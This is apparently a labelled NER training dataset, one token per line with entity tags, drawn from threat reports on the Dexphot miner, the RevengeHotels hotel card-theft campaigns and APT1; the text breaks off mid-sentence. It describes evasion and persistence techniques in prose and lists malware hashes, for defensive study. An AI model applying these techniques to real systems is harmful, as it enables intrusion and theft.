O + +Based O +on O +Microsoft B-TOOL +Defender E-TOOL +ATP O +signals O +, O +SoftwareBundler B-MAL +: I-MAL +Win32/ICLoader E-MAL +and O +its O +variants O +are O +primarily O +used O +to O +drop O +and O +run O +the O +Dexphot B-MAL S-MAL I-MAL +installer E-MAL +. O + +The O +installer O +uses O +two O +URLs O +to O +download O +malicious O +payloads O +. O + +These O +are O +the O +same O +two O +URLs O +that O +Dexphot S-MAL +use O +later O +to O +establish O +persistence O +, O +update O +the O +malware O +, O +and O +re-infect O +the O +device O +. O + +The O +installer O +downloads O +an O +MSI S-TOOL +package O +from O +one O +of O +the O +two O +URLs O +, O +and O +then O +launches O +msiexec.exe S-FILE +to O +perform O +a O +silent O +install O +. O + +This O +is O +the O +first O +of O +several O +instances O +of O +Dexphot S-MAL +employing O +living-off-the-land O +techniques O +, O +the O +use O +of O +legitimate O +system O +processes O +for O +nefarious O +purposes O +. O + +Dexphot S-MAL +’s O +package O +often O +contains O +an O +obfuscated O +batch O +script O +. O + +If O +the O +package O +contains O +this O +file O +, O +the O +script O +is O +the O +first O +thing O +that O +msiexec.exe S-FILE +runs O +when O +it O +begins O +the O +installation O +process O +. O + +The O +said O +obfuscated O +script O +is O +designed O +to O +check O +for O +antivirus O +products O +. O + +Dexphot S-MAL +halts O +the O +infection O +process O +immediately O +if O +an O +antivirus O +product O +is O +found O +running O +. O + +When O +we O +first O +began O +our O +research O +, O +the O +batch O +script O +only O +checked O +for O +antivirus O +products O +from O +Avast S-TOOL +and O +AVG S-TOOL +. O + +Later O +, O +Windows B-TOOL +Defender I-TOOL +Antivirus E-TOOL +was O +added O +to O +the O +checklist O +. 
O + +If O +the O +process O +is O +not O +halted O +, O +Dexphot S-MAL +decompresses O +the O +password-protected O +ZIP O +archive O +from O +the O +MSI S-TOOL +package O +. O + +The O +password O +to O +this O +archive O +is O +within O +the O +MSI S-TOOL +package O +. O + +Along O +with O +the O +password O +, O +the O +malware O +’s O +authors O +also O +include O +a O +clean O +version O +of O +unzIP S-TOOL +. O + +exe S-FILE +so O +that O +they O +do O +n’t O +have O +to O +rely O +on O +the O +target O +system O +having O +a O +ZIP B-TOOL +utility E-TOOL +. O + +The O +unzIP S-TOOL +. O + +exe S-FILE +file O +in O +the O +package O +is O +usually O +named O +various O +things O +, O +such O +as O +z.exe S-FILE +or O +ex.exe S-FILE +, O +to O +avoid O +scrutiny O +. O + +The O +ZIP O +archive O +usually O +contains O +three O +files O +: O +the B-TOOL +loader I-TOOL +DLL E-TOOL +, O +an O +encrypted O +data O +file O +( O +usually O +named O +bin.dat S-FILE +) O +, O +and O +, O +often O +, O +one O +clean B-TOOL +unrelated I-TOOL +DLL E-TOOL +, O +which O +is O +likely O +included O +to O +mislead O +detection O +. O + +Dexphot S-MAL +usually O +extracts O +the O +decompressed O +files O +to O +the O +target O +system O +’s O +Favorites B-TOOL +folder E-TOOL +. O + +The O +files O +are O +given O +new O +, O +random O +names O +, O +which O +are O +generated O +by O +concatenating O +words O +and O +numbers O +based O +on O +the O +time O +of O +execution O +( O +for O +example O +, O +C:\Users\\Favorites\\Res.Center.ponse\ O +) O +. O + +Msiexec.exe S-FILE +next O +calls O +rundll32.exe S-FILE +, O +specifying O +loader B-TOOL +DLL E-TOOL S-TOOL +( O +urlmon.7z S-FILE +in O +the O +example O +above O +) O +in O +order O +to O +decrypt B-MAL +the I-MAL +data I-MAL +file E-MAL +. O + +The O +decryption O +process O +involves O +ADD S-ENCR +and O +XOR S-ENCR +operations O +, O +using O +a O +key O +hardcoded O +in O +the O +binary O +. 
O + +The O +decrypted O +data O +contains O +three O +executables O +. O + +Unlike O +the O +files O +described O +earlier O +, O +these O +executables O +are O +never O +written O +to O +the O +filesystem O +. O + +Instead O +, O +they O +exist O +only O +in O +memory O +, O +and O +Dexphot S-MAL +runs O +them O +by O +loading O +them O +into O +other O +system O +processes O +via O +process B-TOOL +hollowing E-TOOL +. O + +Process B-TOOL +hollowing E-TOOL +is O +a O +technique O +that O +can O +hide O +malware O +within O +a O +legitimate O +system O +process O +. O + +It O +replaces O +the O +contents O +of O +the O +legitimate O +process O +with O +malicious O +code O +. O + +Detecting O +malicious O +code O +hidden O +using O +this O +method O +is O +not O +trivial O +, O +so O +process B-TOOL +hollowing E-TOOL +has O +become O +a O +prevalent O +technique O +used O +by O +malware O +today O +. O + +This O +method O +has O +the O +additional O +benefit O +of O +being O +fileless O +: O +the O +code O +can O +be O +run O +without O +actually O +being O +saved O +on O +the O +file O +system O +. O + +Not O +only O +is O +it O +harder O +to O +detect O +the O +malicious O +code O +while O +it O +’s O +running O +, O +it O +’s O +harder O +to O +find O +useful O +forensics O +after O +the O +process O +has O +stopped O +. O + +To O +initiate O +process B-TOOL +hollowing E-TOOL +, O +the B-TOOL +loader I-TOOL +DLL E-TOOL S-TOOL +targets O +two O +legitimate O +system O +processes O +, O +for O +example O +svchost.exe S-FILE +or O +nslookup.exe S-FILE +, O +and O +spawns O +them O +in O +a O +suspended O +state O +. O + +The B-TOOL +loader I-TOOL +DLL E-TOOL S-TOOL +replaces O +the O +contents O +of O +these O +processes O +with O +the O +first O +and O +second O +decrypted O +executables O +. O + +These O +executables O +are O +monitoring O +services O +for O +maintaining O +Dexphot S-MAL +’s O +components O +. 
O + +The O +now-malicious O +processes O +are O +released O +from O +suspension O +and O +run O +. O + +Next O +, O +the B-TOOL +loader I-TOOL +DLL E-TOOL S-TOOL +targets O +the O +setup.exe S-FILE +file O +in O +SysWoW64 S-OS +. O + +It O +removes O +setup.exe S-FILE +’s O +contents O +and O +replaces O +them O +with O +the O +third O +decrypted O +executable O +, O +a O +cryptocurrency O +miner O +. O + +Although O +Dexphot S-MAL +always O +uses O +a O +cryptocurrency O +miner O +of O +some O +kind O +, O +it O +’s O +not O +always O +the O +same O +miner O +. O + +It O +used O +different O +programs O +like O +XMRig S-MAL +and O +JCE B-MAL +Miner E-MAL +over O +the O +course O +of O +our O +research O +. O + +The O +two O +monitoring O +services O +simultaneously O +check O +the O +status O +of O +all O +three O +malicious O +processes O +. O + +Having O +dual O +monitoring O +services O +provides O +redundancy O +in O +case O +one O +of O +the O +monitoring O +processes O +is O +halted O +. O + +If O +any O +of O +the O +processes O +are O +terminated O +, O +the O +monitors O +immediately O +identify O +the O +situation O +, O +terminate O +all O +remaining O +malicious O +processes O +, O +and O +re-infect O +the O +device O +. O + +The O +monitoring O +components O +also O +detect O +freshly O +launched O +cmd.exe S-FILE +processes O +and O +terminate O +them O +promptly O +. O + +As O +a O +final O +fail-safe O +, O +Dexphot S-ACT +uses O +schtasks.exe S-FILE +to O +create O +scheduled O +tasks O +. O + +This O +persistence O +technique O +is O +interesting O +, O +because O +it O +employs O +two O +distinct O +MITRE B-TOOL +ATT&CK E-TOOL +techniques O +: O +Scheduled B-TOOL +Task E-TOOL +and O +Signed B-TOOL +Binary I-TOOL +Proxy I-TOOL +Execution E-TOOL +. 
O + +The O +scheduled O +tasks O +call O +msiexec.exe S-FILE +as O +a O +proxy O +to O +run O +the O +malicious O +code O +, O +much O +like O +how O +msiexec.exe S-FILE +was O +used O +during O +installation O +. O + +Using O +msiexec.exe S-FILE +, O +a O +legitimate O +system O +process O +, O +can O +make O +it O +harder O +to O +trace O +the O +source O +of O +malicious O +activity O +. O + +Furthermore O +, O +the O +tasks O +allow O +Dexphot S-MAL +to O +conveniently O +update O +the O +payload O +from O +the O +web O +every O +time O +the O +tasks O +run O +. O + +They O +automatically O +update O +all O +of O +Dexphot S-MAL +’s O +components O +, O +both O +upon O +system O +reboot O +as O +well O +as O +every O +90 O +or O +110 O +minutes O +while O +the O +system O +is O +running O +. O + +Dexphot S-MAL +also O +generates O +the O +names O +for O +the O +tasks O +at O +runtime O +, O +which O +means O +a O +simple O +block O +list O +of O +hardcoded O +task O +names O +will O +not O +be O +effective O +in O +preventing O +them O +from O +running O +. O + +The O +names O +are O +usually O +in O +a O +GUID O +format O +, O +although O +after O +we O +released O +our O +first O +round O +of O +Dexphot-blocking O +protections O +, O +the O +threat O +authors O +began O +to O +use O +random O +strings O +. O + +The O +threat O +authors O +have O +one O +more O +evasion O +technique O +for O +these O +scheduled O +tasks O +: O +some O +Dexphot S-MAL +variants O +copy O +msiexec.exe S-FILE +to O +an O +arbitrary O +location O +and O +give O +it O +a O +random O +name O +, O +such O +as O +%AppData%\.exe S-FILE +. O + +This O +makes O +the O +system O +process O +running O +malicious O +code O +a O +literal O +moving O +target O +. O + +Dexphot S-MAL +exhibits O +multiple O +layers O +of O +polymorphism O +across O +the O +binaries O +it O +distributes O +. 
O + +For O +example O +, O +the O +MSI S-TOOL +package O +used O +in O +the O +campaign O +contains O +different O +files O +, O +as O +shown O +in O +the O +table O +below O +. O + +The O +MSI S-TOOL +packages O +generally O +include O +a O +clean O +version O +of O +unzIP S-TOOL +. O + +exe S-FILE +, O +a O +password-protected O +ZIP O +file O +, O +and O +a O +batch O +file O +that O +checks O +for O +currently O +installed O +antivirus O +products O +. O + +However O +, O +the O +batch O +file O +is O +not O +always O +present O +, O +and O +the O +names O +of O +the O +ZIP O +files O +and O +Loader B-TOOL +DLLs E-TOOL +, O +as O +well O +as O +the O +password O +for O +extracting O +the O +ZIP O +file O +, O +all O +change O +from O +one O +package O +to O +the O +next O +. O + +In O +addition O +, O +the O +contents O +of O +each O +Loader B-TOOL +DLL E-TOOL S-TOOL +differs O +from O +package O +to O +package O +, O +as O +does O +the O +encrypted O +data O +included O +in O +the O +ZIP O +file O +. O + +This O +leads O +to O +the O +generation O +of O +a O +different O +ZIP B-TOOL +archive E-TOOL +and O +, O +in O +turn O +, O +a O +unique O +MSI S-TOOL +package O +, O +each O +time O +the O +attacker O +bundles O +the O +files O +together O +. O + +Because O +of O +these O +carefully O +designed O +layers O +of O +polymorphism O +, O +a O +traditional O +file-based O +detection O +approach O +wouldn’t O +be O +effective O +against O +Dexphot S-MAL +. O + +Besides O +tracking O +the O +files O +and O +processes O +that O +Dexphot S-MAL +uses O +to O +execute O +an O +attack O +, O +we O +have O +also O +been O +monitoring O +the O +domains O +used O +to O +host O +malicious O +payloads O +. O + +The O +URLs O +used O +for O +hosting O +all O +follow O +a O +similar O +pattern O +. 
O + +The O +domain O +address O +usually O +ends O +in O +a O +.info S-DOM +or O +.net S-DOM +TLD O +, O +while O +the O +file O +name O +for O +the O +actual O +payload O +consists O +of O +random O +characters O +, O +similar O +to O +the O +randomness O +previously O +seen O +being O +used O +to O +generate O +file O +names O +and O +scheduled O +tasks O +. O + +Many O +of O +the O +URLs O +listed O +were O +in O +use O +for O +an O +extended O +period O +. O + +However O +, O +the O +MSI S-TOOL +packages O +hosted O +at O +each O +URL O +are O +frequently O +changed O +or O +updated O +. O + +In O +addition O +, O +every O +few O +days O +more O +domains O +are O +generated O +to O +host O +more O +payloads O +. O + +After O +a O +few O +months O +of O +monitoring O +, O +we O +were O +able O +to O +identify O +around O +200 O +unique O +Dexphot S-MAL +domains O +. O + +Dexphot S-MAL +is O +not O +the O +type O +of O +attack O +that O +generates O +mainstream O +media O +attention O +; O +it O +’s O +one O +of O +the O +countless O +malware O +campaigns O +that O +are O +active O +at O +any O +given O +time O +. O + +Its O +goal O +is O +a O +very O +common O +one O +in O +cybercriminal O +circles O +— O +to O +install O +a O +coin O +miner O +that O +silently O +steals O +computer O +resources O +and O +generates O +revenue O +for O +the O +attackers O +— O +yet O +Dexphot S-MAL +exemplifies O +the O +level O +of O +complexity O +and O +rate O +of O +evolution O +of O +even O +everyday O +threats O +, O +intent O +on O +evading O +protections O +and O +motivated O +to O +fly O +under O +the O +radar O +for O +the O +prospect O +of O +profit O +. 
O + +To O +combat O +threats O +, O +several O +next-generation O +protection O +engines O +in O +Microsoft B-TOOL +Defender I-TOOL +Advanced I-TOOL +Threat I-TOOL +Protection E-TOOL +’s O +antivirus B-TOOL +component E-TOOL +detect O +and O +stop O +malicious O +techniques O +at O +multiple O +points O +along O +the O +attack O +chain O +. O + +For O +Dexphot S-MAL +, O +machine O +learning-based O +detections O +in O +the O +cloud O +recognize O +and O +block O +the O +DLLs S-TOOL +loaded O +by O +rundll32.exe S-FILE +, O +stopping O +the O +attack O +chain O +in O +its O +early O +stages O +. O + +Memory O +scans O +detect O +and O +terminate O +the O +loading O +of O +malicious O +code O +hidden O +by O +process B-TOOL +hollowing E-TOOL +— O +including O +the O +monitoring O +processes O +that O +attempt O +to O +update O +the O +malware O +code O +and O +re-infect O +the O +machine O +via O +PowerShell S-TOOL +commands O +. O + +Behavioral O +blocking O +and O +containment O +capabilities O +are O +especially O +effective O +in O +defeating O +Dexphot S-MAL +’s O +fileless O +techniques O +, O +detection O +evasion O +, O +and O +persistence O +mechanisms O +, O +including O +the O +periodic O +and O +boot-time O +attempts O +to O +update O +the O +malware O +via O +scheduled O +tasks O +. O + +As O +mentioned O +, O +given O +the O +complexity O +of O +the O +attack O +chain O +and O +of O +Dexphot S-MAL +’s O +persistence O +methods O +, O +we O +released O +a O +remediation O +solution O +that O +prevents O +re-infection O +by O +removing O +artifacts O +. 
O + +The O +detection O +, O +blocking O +, O +and O +remediation O +of O +Dexphot S-MAL +on O +endpoints O +are O +exposed O +in O +Microsoft B-TOOL +Defender I-TOOL +Security I-TOOL +Center E-TOOL +, O +where O +Microsoft B-TOOL +Defender I-TOOL +ATP E-TOOL +’s O +rich O +capabilities O +like O +endpoint O +detection O +and O +response O +, O +automated O +investigation O +and O +remediation O +, O +and O +others O +enable O +security O +operations O +teams O +to O +investigate O +and O +remediate O +attacks O +in O +enterprise O +environments O +. O + +With O +these O +capabilities O +, O +Microsoft B-TOOL +Defender I-TOOL +ATP E-TOOL +provides O +comprehensive O +protection O +against O +Dexphot S-MAL +and O +the O +countless O +other O +complex O +and O +evolving O +threats O +that O +we O +face O +every O +day O +. O + +Dexphot S-MAL +: O +72acaf9ff8a43c68416884a3fff3b23e749b4bb8fb39e16f9976643360ed391f S-SHA2 +. O + +Dexphot S-MAL +: O +22beffb61cbdc2e0c3eefaf068b498b63a193b239500dab25d03790c467379e3 S-SHA2 +. O + +Dexphot S-MAL +: O +65eac7f9b67ff69cefed288f563b4d77917c94c410c6c6c4e4390db66305ca2a S-SHA2 +. O + +Dexphot S-MAL +: O +ba9467e0d63ba65bf10650a3c8d36cd292b3f846983032a44a835e5966bc7e88 S-SHA2 +. O + +Dexphot S-MAL +: O +537d7fe3b426827e40bbdd1d127ddb59effe1e9b3c160804df8922f92e0b366e S-SHA2 +. O + +Dexphot S-MAL +: O +504cc403e0b83233f8d20c0c86b0611facc040b868964b4afbda3214a2c8e1c5 S-SHA2 +. O + +Dexphot S-MAL +: O +aa5c56fe01af091f07c56ac7cbd240948ea6482b6146e0d3848d450977dff152 S-SHA2 +. O + + +RevengeHotels S-APT +: O +cybercrime O +targeting O +hotel O +front O +desks O +worldwide O +. O + +RevengeHotels S-APT +is O +a O +targeted O +cybercrime O +malware O +campaign O +against O +hotels O +, O +hostels O +, O +hospitality O +and O +tourism O +companies O +, O +mainly O +, O +but O +not O +exclusively O +, O +located O +in O +Brazil S-LOC +. 
O + +We O +have O +confirmed O +more O +than O +20 O +hotels O +that O +are O +victims O +of O +the O +group O +, O +located O +in O +eight O +states O +in O +Brazil S-LOC +, O +but O +also O +in O +other O +countries O +such O +as O +Argentina S-LOC +, O +Bolivia S-LOC +, O +Chile S-LOC +, O +Costa B-LOC +Rica E-LOC +, O +France S-LOC +, O +Italy S-LOC +, O +Mexico S-LOC +, O +Portugal S-LOC +, O +Spain S-LOC +, O +Thailand S-LOC +and O +Turkey S-LOC +. O + +The O +goal O +of O +the O +campaign O +is O +to O +capture O +credit O +card O +data O +from O +guests O +and O +travelers O +stored O +in O +hotel O +systems O +, O +as O +well O +as O +credit O +card O +data O +received O +from O +popular O +online B-IDTY +travel I-IDTY +agencies E-IDTY +( O +OTAs S-IDTY +) O +such O +as O +Booking.com S-DOM +. O + +The O +main O +attack O +vector O +is O +via O +email B-ACT +with I-ACT +crafted I-ACT +Word I-ACT +, I-ACT +Excel I-ACT +or I-ACT +PDF I-ACT +documents I-ACT +attached E-ACT +. O + +Some O +of O +them O +exploit O +CVE-2017-0199 S-VULID +, O +loading O +it O +using O +VBS O +and O +PowerShell S-TOOL +scripts O +and O +then O +installing O +customized O +versions O +of O +RevengeRAT S-MAL +, O +NjRAT S-MAL +, O +NanoCoreRAT S-MAL +, O +888 B-MAL +RAT E-MAL +and O +other O +custom O +malware O +such O +as O +ProCC S-MAL +in O +the O +victim O +’s O +machine O +. O + +The O +group O +has O +been O +active O +since O +2015 S-TIME +, O +but O +increased O +its O +attacks O +in O +2019 S-TIME +. O + +In O +our O +research O +, O +we O +were O +also O +able O +to O +track O +two O +groups O +targeting O +the O +hospitality O +sector O +, O +using O +separate O +but O +similar O +infrastructure O +, O +tools O +and O +techniques O +. O + +PaloAlto S-IDTY +has O +already O +written O +about O +one O +of O +them O +. O + +We O +named O +the O +first O +group O +RevengeHotels S-APT +, O +and O +the O +second O +ProCC S-APT +. 
O + +These O +groups O +use O +a O +lot O +of O +social O +engineering O +in O +their O +attacks O +, O +asking O +for O +a O +quote O +from O +what O +appears O +to O +be O +a O +government O +entity O +or O +private O +company O +wanting O +to O +make O +a O +reservation O +for O +a O +large O +number O +of O +people O +. O + +Their O +infrastructure O +also O +relies O +on O +the O +use O +of O +dynamic O +DNS S-PROT +services O +pointing O +to O +commercial O +hosting O +and O +self-hosted O +servers O +. O + +They O +also O +sell O +credentials O +from O +the O +affected O +systems O +, O +allowing O +other O +cybercriminals O +to O +have O +remote O +access O +to O +hotel O +front O +desks O +infected O +by O +the O +campaign O +. O + +We O +monitored O +the O +activities O +of O +these O +groups O +and O +the O +new O +malware O +they O +are O +creating O +for O +over O +a O +year O +. O + +With O +a O +high O +degree O +of O +confidence O +, O +we O +can O +confirm O +that O +at O +least O +two O +distinct O +groups O +are O +focused O +on O +attacking O +this O +sector O +; O +there O +is O +also O +a O +third O +group O +, O +though O +it O +is O +unclear O +if O +its O +focus O +is O +solely O +on O +this O +sector O +or O +if O +carries O +out O +other O +types O +of O +attacks O +. O + +One O +of O +the O +tactics O +used O +in O +operations O +by O +these O +groups O +is O +highly O +targeted O +spear-phishing B-ACT +messages E-ACT +. O + +They O +register O +typo-squatting O +domains O +, O +impersonating O +legitimate O +companies O +. O + +The O +emails S-TOOL +are O +well O +written O +, O +with O +an O +abundance O +of O +detail O +. O + +They O +explain O +why O +the O +company O +has O +chosen O +to O +book O +that O +particular O +hotel O +. O + +By O +checking O +the O +sender O +information O +, O +it O +’s O +possible O +to O +determine O +whether O +the O +company O +actually O +exists O +. 
O + +However O +, O +there O +is O +a O +small O +difference O +between O +the O +domain O +used O +to O +send O +the O +email S-TOOL +and O +the O +real O +one O +. O + +This O +spear-phishing S-ACT +message O +, O +written O +in O +Portuguese O +, O +has O +a O +malicious O +file O +attached O +misusing O +the O +name O +of O +a O +real O +attorney O +office O +, O +while O +the O +domain O +sender O +of O +the O +message O +was O +registered O +one O +day O +before O +, O +using O +a O +typo-squatting O +domain O +. O + +The O +group O +goes O +further O +in O +its O +social O +engineering O +effort O +: O +to O +convince O +the O +hotel O +personnel O +about O +the O +legitimacy O +of O +their O +request O +, O +a O +copy O +of O +the O +National O +Registry O +of O +Legal O +Entities O +card O +( O +CNPJ O +) O +is O +attached O +to O +the O +quotation O +. O + +The O +attached O +file O +, O +Reserva B-FILE +Advogados I-FILE +Associados.docx E-FILE +( O +Attorneys B-FILE +Associates I-FILE +Reservation.docx E-FILE +) O +, O +is O +a O +malicious O +Word O +file O +that O +drops O +a O +remote O +OLE S-TOOL +object O +via O +template O +injection O +to O +execute O +macro O +code O +. O + +The O +macro O +code O +inside O +the O +remote O +OLE S-TOOL +document O +contains O +PowerShell S-TOOL +commands O +that O +download O +and O +execute O +the O +final O +payload O +. O + +In O +the O +RevengeHotels S-APT +campaign O +, O +the O +downloaded O +files O +are O +.NET S-FILE +binaries O +protected O +with O +the O +Yoda B-MAL +Obfuscator E-MAL +. O + +After O +unpacking O +them O +, O +the O +code O +is O +recognizable O +as O +the O +commercial O +RAT S-MAL +RevengeRAT S-MAL +. O + +An O +additional O +module O +written O +by O +the O +group O +called O +ScreenBooking S-MAL +is O +used O +to O +capture O +credit O +card O +data O +. O + +It O +monitors O +whether O +the O +user O +is O +browsing O +the O +web O +page O +. 
O + +In O +the O +initial O +versions O +, O +back O +in O +2016 S-TIME +, O +the O +downloaded O +files O +from O +RevengeHotels S-APT +campaigns O +were O +divided O +into O +two O +modules O +: O +a O +backdoor S-MAL +and O +a O +module O +to O +capture O +screenshots O +. O + +Recently O +we O +noticed O +that O +these O +modules O +had O +been O +merged O +into O +a O +single O +backdoor O +module O +able O +to O +collect O +data O +from O +clipboard O +and O +capture O +screenshots O +. O + +In O +this O +example O +, O +the O +webpage O +that O +the O +attacker O +is O +monitoring O +is O +booking.com S-DOM +( O +more O +specifically O +, O +the O +page O +containing O +the O +card O +details O +) O +. O + +The O +code O +is O +specifically O +looking O +for O +data O +in O +Portuguese O +and O +English O +, O +allowing O +the O +attackers O +to O +steal O +credit O +card O +data O +from O +web O +pages O +written O +in O +these O +languages O +. O + +In O +the O +ProCC S-APT +campaigns O +, O +the O +downloaded O +files O +are O +Delphi S-TOOL +binaries O +. O + +The O +backdoor S-MAL +installed O +in O +the O +machine O +is O +more O +customized O +than O +that O +used O +by O +RevengeHotels S-APT +: O +it O +’s O +developed O +from O +scratch O +and O +is O +able O +to O +collect O +data O +from O +the O +clipboard O +and O +printer O +spooler O +, O +and O +capture O +screenshots O +. O + +Because O +the O +personnel O +in O +charge O +of O +confirming O +reservations O +usually O +need O +to O +pull O +credit O +card O +data O +from O +OTA B-TOOL +websites E-TOOL +, O +it O +’s O +possible O +to O +collect O +card O +numbers O +by O +monitoring O +the O +clipboard O +and O +the O +documents O +sent O +to O +the O +printer O +. 
O + +According O +to O +the O +relevant O +underground O +forums O +and O +messaging O +groups O +, O +these O +criminals O +also O +infect O +front O +desk O +machines O +in O +order O +to O +capture O +credentials O +from O +the O +hotel O +administration O +software O +; O +they O +can O +then O +steal O +credit O +card O +details O +from O +it O +too O +. O + +Some O +criminals O +also O +sell O +remote O +access O +to O +these O +systems O +, O +acting O +as O +a O +concierge O +for O +other O +cybercriminals O +by O +giving O +them O +permanent O +access O +to O +steal O +new O +data O +by O +themselves O +. O + +Some O +Brazilian B-APT +criminals E-APT +tout O +credit O +card O +data O +extracted O +from O +a O +hotel O +’s O +system O +as O +high O +quality O +and O +reliable O +because O +it O +was O +extracted B-ACT +from I-ACT +a I-ACT +trusted I-ACT +source I-ACT +, I-ACT +i.e. I-ACT +, I-ACT +a I-ACT +hotel I-ACT +administration I-ACT +system E-ACT +. O + +The O +majority O +of O +the O +victims O +are O +associated O +with O +the O +hospitality O +sector O +. O + +Based O +on O +the O +routines O +used O +, O +we O +estimate O +that O +this O +attack O +has O +a O +global O +reach O +. O + +Based O +on O +data O +extracted O +from O +Bit.ly S-DOM +statistics O +, O +we O +can O +see O +that O +potential O +victims O +from O +many O +other O +countries O +have O +at O +least O +accessed O +the O +malicious O +link O +. O + +This O +data O +suggests O +that O +the O +number O +of O +countries O +with O +potential O +victims O +is O +higher O +than O +our O +telemetry O +has O +registered O +. O + +RevengeHotels S-APT +is O +a O +campaign O +that O +has O +been O +active O +since O +at O +least O +2015 S-TIME +, O +revealing O +different O +groups O +using O +traditional O +RAT S-MAL +malware O +to O +infect O +businesses O +in O +the O +hospitality O +sector O +. 
O + +While O +there O +is O +a O +marked O +interest O +in O +Brazilian O +victims O +, O +our O +telemetry O +shows O +that O +their O +reach O +has O +extended O +to O +other O +countries O +in O +Latin B-LOC +America E-LOC +and O +beyond O +. O + +The O +use O +of O +spear-phishing B-ACT +emails E-ACT +, O +malicious O +documents O +and O +RAT S-MAL +malware O +is O +yielding O +significant O +results O +for O +at O +least O +two O +groups O +we O +have O +identified O +in O +this O +campaign O +. O + +Other O +threat O +actors O +may O +also O +be O +part O +of O +this O +wave O +of O +attacks O +, O +though O +there O +is O +no O +confirmation O +at O +the O +current O +time O +. O + +If O +you O +want O +to O +be O +a O +savvy O +and O +safe O +traveler O +, O +it O +’s O +highly O +recommended O +to O +use O +a O +virtual O +payment O +card O +for O +reservations O +made O +via O +OTAs S-TOOL +, O +as O +these O +cards O +normally O +expire O +after O +one O +charge O +. O + +While O +paying O +for O +your O +reservation O +or O +checking O +out O +at O +a O +hotel O +, O +it O +’s O +a O +good O +idea O +to O +use O +a O +virtual O +wallet O +such O +as O +Apple B-TOOL +Pay E-TOOL +, O +Google B-TOOL +Pay E-TOOL +, O +etc O +. O + +RevengeHotels S-APT +: O +74440d5d0e6ae9b9a03d06dd61718f66 S-MD5 +. O + +RevengeHotels S-APT +: O +e675bdf6557350a02f15c14f386fcc47 S-MD5 +. O + +RevengeHotels S-APT +: O +df632e25c32e8f8ad75ed3c50dd1cd47 S-MD5 +. O + +RevengeHotels S-APT +: O +a089efd7dd9180f9b726594bb6cf81ae S-MD5 +. O + +RevengeHotels S-APT +: O +81701c891a1766c51c74bcfaf285854b S-MD5 +. O + +APT1 S-APT +. 
O + +Since O +2004 S-TIME +, O +Mandiant S-SECTEAM +has O +investigated O +computer O +security O +breaches O +at O +hundreds O +of O +organizations O +around O +the O +world.The O +majority O +of O +these O +security O +breaches O +are O +attributed O +to O +advanced O +threat O +actors O +referred O +to O +as O +the O +“ O +Advanced O +Persistent O +Threat O +” O +( O +APT O +) O +. O + +We O +first O +published O +details O +about O +the O +APT O +in O +our O +January B-TIME +2010 E-TIME +M-Trends S-IDTY +report O +. O + +As O +we O +stated O +in O +there O +port O +, O +our O +position O +was O +that O +“ O +The O +Chinese O +government O +may O +authorize O +this O +activity O +, O +but O +there O +’s O +no O +way O +to O +determine O +the O +extent O +of O +its O +involvement. O +” O +Now O +, O +three O +years O +later O +, O +we O +have O +the O +evidence O +required O +to O +change O +our O +assessment O +. O + +The O +details O +we O +have O +analyzed O +during O +hundreds O +of O +investigations O +convince O +us O +that O +the O +groups O +conducting O +these O +activities O +are O +based O +primarily O +in O +China S-LOC +and O +that O +the O +Chinese O +Government O +is O +aware O +of O +them O +. O + +Mandiant S-SECTEAM +continues O +to O +track O +dozens O +of O +APT O +groups O +around O +the O +world O +; O +however O +, O +this O +report O +is O +focused O +on O +the O +most O +prolific O +of O +these O +groups O +. O + +We O +refer O +to O +this O +group O +as O +“ O +APT1 S-APT +” O +and O +it O +is O +one O +of O +more O +than O +20 O +APT O +groups O +with O +origins O +inChina S-LOC +. O + +APT1 S-APT +is O +a O +single O +organization O +of O +operators O +that O +has O +conducted O +a O +cyber B-ACT +espionage E-ACT +campaign O +against O +a O +broad O +range O +of O +victims O +since O +at O +least O +2006 S-TIME +. 
O + +From O +our O +observations O +, O +it O +is O +one O +of O +the O +most O +prolific O +cyber B-ACT +espionage E-ACT +groups O +in O +terms O +of O +the O +sheer O +quantity O +of O +information O +stolen O +. O + +The O +scale O +and O +impact O +of O +APT1 S-APT +’s O +operations O +compelled O +us O +to O +write O +this O +report O +. O + +The O +activity O +we O +have O +directly O +observed O +likely O +represents O +only O +a O +small O +fraction O +of O +the O +cyber B-ACT +espionage E-ACT +that O +APT1 S-APT +has O +conducted O +. O + +Though O +our O +visibility O +of O +APT1 S-APT +’s O +activities O +is O +incomplete O +, O +we O +have O +analyzed O +the O +group O +’s O +intrusions O +against O +nearly O +150 O +victims O +over O +seven O +years O +. O + +From O +our O +unique O +vantage O +point O +responding O +to O +victims O +, O +we O +tracked O +APT1 S-APT +back O +to O +four O +large O +networks O +in O +Shanghai S-LOC +, O +two O +of O +which O +are O +allocated O +directly O +to O +the O +Pudong B-LOC +New I-LOC +Area E-LOC +. O + +We O +uncovered O +a O +substantial O +amount O +of O +APT1 S-APT +’s O +attack O +infrastructure O +, O +command O +and O +control O +, O +and O +modus O +operandi O +( O +tools O +, O +tactics O +, O +and O +procedures O +) O +. O + +In O +an O +effort O +to O +underscore O +there O +are O +actual O +individuals O +behind O +the O +keyboard O +, O +Mandiant S-SECTEAM +is O +revealing O +three O +personas O +we O +have O +attributed O +to O +APT1 S-APT +. O + +These O +operators O +, O +like O +soldiers O +, O +may O +merely O +be O +following O +orders O +given O +to O +them O +by O +others O +. O + +Our O +analysis O +has O +led O +us O +to O +conclude O +that O +APT1 S-APT +is O +likely O +government-sponsored O +and O +one O +of O +the O +most O +persistent O +of O +China S-LOC +’s O +cyber O +threat O +actors O +. 
O + +We O +believe O +that O +APT1 S-APT +is O +able O +to O +wage O +such O +a O +long-running O +and O +extensive O +cyber B-ACT +espionage E-ACT +campaign O +in O +large O +part O +because O +it O +receives O +direct O +government O +support O +. O + +In O +seeking O +to O +identify O +the O +organization O +behind O +this O +activity O +,our O +research O +found O +that O +People B-IDTY +’s I-IDTY +Liberation I-IDTY +Army E-IDTY +( O +PLA S-IDTY +’s O +) O +Unit B-IDTY +61398 E-IDTY +is O +similar O +to O +APT1 S-APT +in O +its O +mission O +, O +capabilities O +, O +and O +resources O +. O + +PLA S-IDTY +Unit B-IDTY +61398 E-IDTY +is O +also O +located O +in O +precisely O +the O +same O +area O +from O +which O +APT1 S-APT +activity O +appears O +to O +originate O +. O + +APT1 S-APT +is O +believed O +to O +be O +the O +2nd O +Bureau B-IDTY +of I-IDTY +the I-IDTY +People I-IDTY +’s I-IDTY +Liberation I-IDTY +Army E-IDTY +( O +PLA S-IDTY +) O +General B-IDTY +Staff I-IDTY +Department E-IDTY +’s O +( O +GSD S-IDTY +) O +3rd O +Department O +, O +which O +is O +most O +commonly O +known O +by O +its O +Military B-IDTY +Unit I-IDTY +Cover I-IDTY +Designator E-IDTY +( O +MUCD S-IDTY +) O +as O +Unit 